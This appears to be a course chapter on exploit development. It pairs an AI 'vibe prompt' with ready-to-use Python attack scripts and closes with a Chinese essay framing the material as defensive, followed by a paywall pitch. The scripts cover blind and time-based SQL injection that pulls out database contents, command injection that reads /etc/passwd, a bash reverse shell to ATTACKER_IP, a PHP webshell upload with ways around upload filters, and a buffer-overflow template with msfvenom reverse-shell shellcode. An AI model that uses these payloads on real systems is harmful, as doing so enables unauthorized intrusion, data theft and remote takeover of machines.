Exploit Development

🔥 Vibe Prompt

"Develop exploit for Blind SQLi: extract DB name, tables, columns via boolean-based inference."

Blind SQLi Exploit

import requests
import string

URL = "http://target.com/item?id=1"

def check(condition):
    """Returns True if condition is true"""
    payload = f"1 AND ({condition})"
    r = requests.get(URL.replace("id=1", f"id={payload}"))
    return "Item found" in r.text  # Boolean oracle

# Extract DB version
db_version = ""
for i in range(1, 10):
    for c in string.digits + ".":
        if check(f"SUBSTR(version(),{i},1)='{c}'"):
            db_version += c
            print(f"DB version: {db_version}")
            break

# Extract table names
tables = []
for i in range(1, 20):  # Try first 20 tables
    table_name = ""
    for j in range(1, 30):  # Max name length 30
        found = False
        for c in string.ascii_lowercase + "_":
            if check(f"SUBSTR((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET {i-1}),{j},1)='{c}'"):
                table_name += c
                found = True
                break
        if not found:
            if table_name:
                tables.append(table_name)
                print(f"Table {i}: {table_name}")
            break

# Extract data from first table
data = ""
for i in range(1, 20):
    for c in string.printable:
        if c in ("'", "`"): continue
        payload = f"SUBSTR((SELECT * FROM {tables[0]} LIMIT 1),{i},1)='{c}'"
        if check(payload):
            data += c
            print(f"Data: {data}")
            break
    if len(data) < i:  # No more data
        break

Time-Based Blind SQLi

import requests, time

def time_check(condition):
    payload = f"1; IF({condition}) WAITFOR DELAY '0:0:5'--"
    start = time.time()
    requests.get(URL.replace("id=1", f"id={payload}"), timeout=10)
    return time.time() - start > 4  # >4s = true

# Exploit: check if admin exists
if time_check("SELECT COUNT(*) FROM users WHERE role='admin' > 0"):
    print("Admin user exists!")

Command Injection Exploit

import requests

# Ping command injection
payload = "127.0.0.1; cat /etc/passwd"
r = requests.post("http://target.com/ping", data={"ip": payload})
if "root:" in r.text:
    print("Command injection confirmed!")
    # Extract all users
    for line in r.text.split("\n"):
        if ":" in line and not line.startswith("<!"):
            print(f"User: {line.split(':')[0]}")

# Reverse shell
# Listen: nc -lvnp 4444
payload2 = "127.0.0.1; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

File Upload Exploit

# Upload webshell
files = {"file": ("shell.php", "<?php system($_GET['cmd']); ?>", "image/jpeg")}
r = requests.post("http://target.com/upload", files=files)

# Execute commands
r = requests.get(f"http://target.com/uploads/shell.php?cmd=id")
print(f"Command output: {r.text}")

# Better: use .phtml, .php5, .shtml (bypass extension filter)
files2 = {"file": ("shell.phtml", "<?=system($_GET['c'])?>", "image/jpeg")}

Buffer Overflow (Basic)

import socket

# EIP offset: 524 bytes
payload = b"A" * 524  # Fill buffer + EBP
payload += b"BBBB"     # Overwrite EIP (control execution)
payload += b"\x90" * 32  # NOP sled
payload += shellcode    # Your shellcode

s = socket.socket()
s.connect(("target.com", 9999))
s.send(payload + b"\r\n")
s.close()

Exploit Development Process

1. Fuzzing: find crash point (SPIKE, Peach)
2. Control: determine offset to EIP
3. Bad chars: identify bad bytes (\x00, \x0a)
4. Return: find JMP ESP address (mona.py)
5. Shellcode: generate with msfvenom
6. Exploit: assemble final payload
7. Test: debug with Immunity / WinDbg

Python Exploit Template

# !/usr/bin/env python3
import sys, socket

def exploit(target, port):
    offset = 524
    eip = b"\x42\x42\x42\x42"
    
    # msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -b "\x00\x0a" -f python
    shellcode = b""
    
    payload = b"A" * offset + eip + b"\x90" * 16 + shellcode
    
    s = socket.socket()
    s.connect((target, port))
    s.send(payload)
    s.close()
    print(f"Exploit sent to {target}:{port}")

if __name__ == "__main__":
    exploit(sys.argv[1], int(sys.argv[2]))

Best Practices

  • Always use safe SEH/vectored exception handling
  • Test exploit multiple times
  • Add version/OS checks before exploitation
  • Use Egghunters for limited buffer space
  • Document exploit prerequisites
  • Clean up artifacts after testing


漏洞利用開發:不只是攻擊,更是防禦

你可能覺得漏洞利用(Exploit Development)是駭客在用的東西。但事實上,了解如何攻擊是建立防禦的前提——你不知道攻擊者怎麼進來,就不知道該怎麼防。

漏洞利用的生命週期

發現漏洞 → 驗證是否存在 → 開發 PoC → 建立 Exploit → 回報/修補

專業的滲透測試人員不是為了破壞,而是為了:

  1. 證明漏洞可被利用:光說「這裡可能不安全」不夠,要實際展示如何入侵
  2. 評估風險等級:能遠端直接拿 Shell 的漏洞比要互動的漏洞嚴重得多
  3. 協助修補:提供 PoC 讓開發團隊複現問題並驗證修復

黑箱 vs 白箱測試

| 測試方式 | 已知資訊 | 適合階段 | |:--------|:--------|:--------| | 黑箱(Black Box) | 只知道目標網址 | 外部滲透測試、紅隊演練 | | 灰箱(Gray Box) | 知道部分架構和帳號 | 標準滲透測試 | | 白箱(White Box) | 原始碼和架構全開 | 程式碼審查、SDL 安全開發 |

下一章預告:Web 漏洞利用

這章學了漏洞利用開發的基礎概念。下一章將聚焦在 Web 應用最常見的漏洞——SQL Injection、XSS、SSRF,以及如何繞過常見的 WAF 防護。

解鎖完整教學內容

本章為付費內容。加入專案即可解鎖超過 5000 字的深度解析,包含 10 個以上神級 Prompt 與真實 Source Code 範例!